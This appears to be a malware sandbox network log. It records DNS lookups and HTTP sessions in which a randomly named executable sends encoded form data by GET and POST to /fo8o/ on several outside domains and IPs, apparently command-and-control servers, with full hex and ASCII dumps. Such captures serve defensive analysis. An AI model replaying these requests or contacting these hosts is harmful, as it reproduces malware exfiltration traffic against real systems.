Nov 21, 2024 12:54:10.731642008 CET | 1.1.1.1 | 192.168.2.4 | 0xc423 | Name error (3) | www.antonio-vivaldi.mobi | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:54:19.113535881 CET | 1.1.1.1 | 192.168.2.4 | 0xdb82 | No error (0) | www.magmadokum.com | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 21, 2024 12:54:19.113535881 CET | 1.1.1.1 | 192.168.2.4 | 0xdb82 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 21, 2024 12:54:19.113535881 CET | 1.1.1.1 | 192.168.2.4 | 0xdb82 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:55:33.799339056 CET | 1.1.1.1 | 192.168.2.4 | 0x3006 | No error (0) | www.rssnewscast.com | | 91.195.240.94 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:55:48.804826975 CET | 1.1.1.1 | 192.168.2.4 | 0x22ca | Name error (3) | www.liangyuen528.com | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:55:57.222434044 CET | 1.1.1.1 | 192.168.2.4 | 0xfffa | No error (0) | www.techchains.info | | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:56:11.971231937 CET | 1.1.1.1 | 192.168.2.4 | 0x51ab | No error (0) | www.elettrosistemista.zip | elettrosistemista.zip | | CNAME (Canonical name) | IN (0x0001) | false
Nov 21, 2024 12:56:11.971231937 CET | 1.1.1.1 | 192.168.2.4 | 0x51ab | No error (0) | elettrosistemista.zip | | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:56:26.785492897 CET | 1.1.1.1 | 192.168.2.4 | 0x7c07 | Name error (3) | www.donnavariedades.com | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:56:35.084980965 CET | 1.1.1.1 | 192.168.2.4 | 0x280f | Name error (3) | www.660danm.top | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:56:43.448860884 CET | 1.1.1.1 | 192.168.2.4 | 0x248a | No error (0) | www.empowermedeco.com | empowermedeco.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 21, 2024 12:56:43.448860884 CET | 1.1.1.1 | 192.168.2.4 | 0x248a | No error (0) | empowermedeco.com | | 217.196.55.202 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:56:58.076641083 CET | 1.1.1.1 | 192.168.2.4 | 0xfd21 | Name error (3) | www.joyesi.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:57:06.887583971 CET | 1.1.1.1 | 192.168.2.4 | 0xbe75 | Name error (3) | www.k9vyp11no3.cfd | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:57:15.176017046 CET | 1.1.1.1 | 192.168.2.4 | 0x54fa | Name error (3) | www.shenzhoucui.com | none | none | A (IP address) | IN (0x0001) | false
                                                                              • www.3xfootball.com
                                                                              • www.goldenjade-travel.com
                                                                              • www.magmadokum.com
                                                                              • www.rssnewscast.com
                                                                              • www.techchains.info
                                                                              • www.elettrosistemista.zip
                                                                              • www.empowermedeco.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 154.215.72.110 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:53:30.340529919 CET | 507 | OUT | GET /fo8o/?0xilO=7vZpwBG&SHqP-p=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Host: www.3xfootball.com
                                                                              Connection: close
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Nov 21, 2024 12:53:31.927459955 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Thu, 21 Nov 2024 11:53:31 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 116.50.37.244 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:53:56.022408962 CET | 798 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.goldenjade-travel.com
                                                                              Origin: http://www.goldenjade-travel.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 203
                                                                              Referer: http://www.goldenjade-travel.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 64 4c 4e 69 4b 4e 35 6c 6e 6e 59 57 6a 72 30 50 55 51 69 66 77 72 76 4a 78 5a 5a 4d 4e 6d 50 57 67 3d 3d
                                                                              Data Ascii: SHqP-p=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOdLNiKN5lnnYWjr0PUQifwrvJxZZMNmPWg==
Nov 21, 2024 12:53:57.640067101 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                              Content-Type: text/html; charset=us-ascii
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Thu, 21 Nov 2024 11:53:56 GMT
                                                                              Connection: close
                                                                              Content-Length: 315
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49745 | 116.50.37.244 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:53:58.672393084 CET | 818 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.goldenjade-travel.com
                                                                              Origin: http://www.goldenjade-travel.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 223
                                                                              Referer: http://www.goldenjade-travel.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 50 63 55 32 51 74 42 4f 62 47 4e 6b 77 72 32 43 59 67 38 41 68 2b 2f 4a 67 36 67 70 45 6a 72 56 55 3d
                                                                              Data Ascii: SHqP-p=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwPcU2QtBObGNkwr2CYg8Ah+/Jg6gpEjrVU=
Nov 21, 2024 12:54:00.241486073 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                              Content-Type: text/html; charset=us-ascii
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Thu, 21 Nov 2024 11:53:59 GMT
                                                                              Connection: close
                                                                              Content-Length: 315
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49751 | 116.50.37.244 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:54:01.326410055 CET | 10900 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.goldenjade-travel.com
                                                                              Origin: http://www.goldenjade-travel.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 10303
                                                                              Referer: http://www.goldenjade-travel.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 31 6c 5a 52 68 6e 6e 47 47 38 30 5a 50 75 46 57 32 34 52 38 33 5a 36 75 7a 68 41 38 70 49 79 36 71 70 35 32 67 37 47 6f 59 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 48 4b 75 73 68 32 58 31 32 56 6f 59 48 76 33 4f 77 2b 5a 55 2b 78 63 32 41 71 79 6c 65 38 74 45 58 6b 41 56 2f 49 78 6b 4a 66 6b 30 51 50 51 44 61 69 4c 6c 4c 55 6a 37 41 31 6e 65 50 54 4a 73 75 48 61 37 32 65 43 66 48 68 58 7a 6f 45 72 62 [TRUNCATED]
                                                                              Data Ascii: SHqP-p=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnfie0/xL1lZRhnnGG80ZPuFW24R83Z6uzhA8pIy6qp52g7GoYSYVIhPI3veg7BtjvHtcnQ5X66Fo/aB5fuHKush2X12VoYHv3Ow+ZU+xc2Aqyle8tEXkAV/IxkJfk0QPQDaiLlLUj7A1nePTJsuHa72eCfHhXzoErbJI7p0dZ0pvtJLPZCNBbfkZZuwld9LpKhkNEJcSFOpl0hwuQzM9OQ/06997bt03YSdIl1xfzR1paiBmgpgShwwcgWK2BHOIJ9pQzQmp/aD7JQSgbpKyX1LMz97dC3vpXT3T1LmfKc9RuG9FmNkX7rQVVFILVYi6fvP8mkfpU7Ub0LSpcQNjipOC0C/C+nZq/IVMWXhXRD53Din+vxQqiZwpVUJitjjiixIvySAQTu7i2pB2AbFWoNuRZF040YNoZpACYJlJyTbOftlZduaTAPmKC17B0A12pI4KZk94p8f7ouqcGtZpOv+7FgBiooP+OK41b6hivVy32G5UaAEsxSpFLYPJBxa1ZdR+vlj9IPg+HYBFaY3ZcsS4vBiQvd8+YEtGOTttG4kJLaib5p9RHFexGC5PDr6OwcxU/+X6wqyXE4SSRslpqvOvtYg54LeLHsKS7XiPqU35EdT52sfLN1AkWYVAqSNJ48HgNyqyX76+L+QJcUICRB5XPJiCkT4c5xhxV5sZh8T14Qm+BCAWAVGAb8okuU5+LbGl0CaMHYmni6NYZMRIBwwGzlHkVarquRdNwmCte0coo2aX+9i/xOFsUkIK3Ux/fgJ2rn0ElRR0LKiSxqU/5yT+uC1HI1lkflUrMhIcrcSKK5VXxofzw1KR7NuTOVYykvxW [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49762 | 116.50.37.244 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:54:03.967367887 CET | 514 | OUT | GET /fo8o/?0xilO=7vZpwBG&SHqP-p=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Host: www.goldenjade-travel.com
                                                                              Connection: close
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Nov 21, 2024 12:54:05.481537104 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                              Content-Type: text/html; charset=us-ascii
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Thu, 21 Nov 2024 11:54:04 GMT
                                                                              Connection: close
                                                                              Content-Length: 315
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49793 | 85.159.66.93 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:54:19.241039038 CET | 777 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.magmadokum.com
                                                                              Origin: http://www.magmadokum.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 203
                                                                              Referer: http://www.magmadokum.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 6b 37 45 61 72 56 62 45 53 75 75 52 42 67 2b 62 76 78 5a 38 35 44 44 61 79 53 41 48 58 4c 67 73 77 3d 3d
                                                                              Data Ascii: SHqP-p=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0k7EarVbESuuRBg+bvxZ85DDaySAHXLgsw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49800 | 85.159.66.93 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:54:21.889743090 CET | 797 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.magmadokum.com
                                                                              Origin: http://www.magmadokum.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 223
                                                                              Referer: http://www.magmadokum.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6e 77 48 31 62 30 4b 55 32 70 33 31 34 55 71 54 73 4a 79 47 36 4e 68 6e 69 4b 2b 6f 68 44 4d 49 4d 3d
                                                                              Data Ascii: SHqP-p=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5nwH1b0KU2p314UqTsJyG6NhniK+ohDMIM=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
